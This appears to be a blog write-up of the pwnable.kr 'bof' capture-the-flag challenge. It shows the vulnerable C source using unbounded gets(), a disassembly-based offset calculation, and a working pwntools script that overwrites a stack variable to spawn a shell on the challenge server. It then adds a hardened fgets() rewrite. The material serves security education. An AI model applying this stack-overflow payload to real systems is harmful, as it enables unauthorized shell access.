PWN study notes: [Toddler's Bottle]-[bof]
Source: Internet  Published by: 手机淘宝联系天猫客服  Editor: 程序博客网  Time: 2024/06/13 01:45
Download the bof binary and bof.c.
```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);   // smash me!  (unbounded read into a 32-byte stack buffer)
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}

int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}
```
From bof.c we can see that a shell is spawned when key == 0xcafebabe, but since func is called with the argument 0xdeadbeef, getting a shell looks impossible at first glance.
However, func fills overflowme with gets(), which imposes no length limit. That is the basis of the overflow: by overrunning overflowme we can overwrite key so that key == 0xcafebabe.
Let's look at the assembly of func:
```asm
0x0000062c <+0>:  push ebp
0x0000062d <+1>:  mov ebp,esp
0x0000062f <+3>:  sub esp,0x48
0x00000632 <+6>:  mov eax,gs:0x14
0x00000638 <+12>: mov DWORD PTR [ebp-0xc],eax
0x0000063b <+15>: xor eax,eax
0x0000063d <+17>: mov DWORD PTR [esp],0x78c
0x00000644 <+24>: call 0x645 <func+25>
0x00000649 <+29>: lea eax,[ebp-0x2c]                  // [ebp-0x2c] is overflowme
0x0000064c <+32>: mov DWORD PTR [esp],eax
0x0000064f <+35>: call 0x650 <func+36>
0x00000654 <+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe  // [ebp+0x8] is key
0x0000065b <+47>: jne 0x66b <func+63>
0x0000065d <+49>: mov DWORD PTR [esp],0x79b
0x00000664 <+56>: call 0x665 <func+57>
0x00000669 <+61>: jmp 0x677 <func+75>
0x0000066b <+63>: mov DWORD PTR [esp],0x7a3
0x00000672 <+70>: call 0x673 <func+71>
0x00000677 <+75>: mov eax,DWORD PTR [ebp-0xc]
0x0000067a <+78>: xor eax,DWORD PTR gs:0x14
0x00000681 <+85>: je 0x688 <func+92>
0x00000683 <+87>: call 0x684 <func+88>
0x00000688 <+92>: leave
0x00000689 <+93>: ret
```
From the assembly we can see that [ebp-0x2c] is overflowme and [ebp+0x8] is key. The distance from the start of overflowme to key is 0x2c (44) bytes up to the saved ebp, plus 4 bytes of saved ebp and 4 bytes of return address, i.e. 52 bytes. So we only need 52 bytes of padding followed by 0xcafebabe to get a shell.
Our exploit is therefore:
```python
from pwn import *

# 52 bytes of padding reach key at [ebp+0x8]; then overwrite it with 0xcafebabe (little-endian)
payload = b'a' * 52 + p32(0xcafebabe)
# p = process("./bof")
p = remote('pwnable.kr', 9000)
p.recvline()
p.recvuntil("\n")
p.sendline(payload)
p.interactive()
```
Then run cat flag to read the flag.
Finally, the files are attached for practice: link
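The fix for this bug, as an added example that is not part of the original post or the pwnable.kr source: the same func() with the unbounded gets() replaced by a bounded fgets() read, so input can no longer run past the 32-byte buffer into the saved ebp, the return address and key. The names func_hardened and check_with_input are assumptions; the helper stages a constructed line in an ISO C temporary file so the fix can be checked offline.

```c
#include <stdio.h>
#include <string.h>

/* Hardened rewrite of the challenge's func() (added example, not the
 * pwnable.kr source). fgets() writes at most sizeof(overflowme)-1 bytes plus
 * a terminating NUL, so a long line can no longer overrun the 32-byte buffer
 * into the saved ebp, the return address and the key argument at [ebp+0x8].
 * The key check is kept, but the result is returned instead of spawning a
 * shell so the function can be exercised in a test. */
int func_hardened(unsigned int key, FILE *in)
{
    char overflowme[32];

    if (fgets(overflowme, sizeof overflowme, in) == NULL)
        return 0;                   /* EOF or read error: treat as no match */

    /* No newline means the line was longer than the buffer: discard the
     * remainder so it is not misread as the next input. */
    if (strchr(overflowme, '\n') == NULL) {
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }

    return key == 0xcafebabe ? 1 : 0;
}

/* Test helper (assumed name): run func_hardened() on a constructed input line
 * staged in a temporary file that stands in for stdin. Returns -1 on setup
 * failure, otherwise func_hardened()'s result. */
int check_with_input(unsigned int key, const char *line)
{
    FILE *in = tmpfile();
    if (in == NULL)
        return -1;
    fputs(line, in);
    rewind(in);
    int r = func_hardened(key, in);
    fclose(in);
    return r;
}

int main(void)
{
    printf("overflow me : ");
    fflush(stdout);
    /* Same argument as the original; the padding+key payload no longer matters */
    printf(func_hardened(0xdeadbeef, stdin) ? "match\n" : "Nah..\n");
    return 0;
}
```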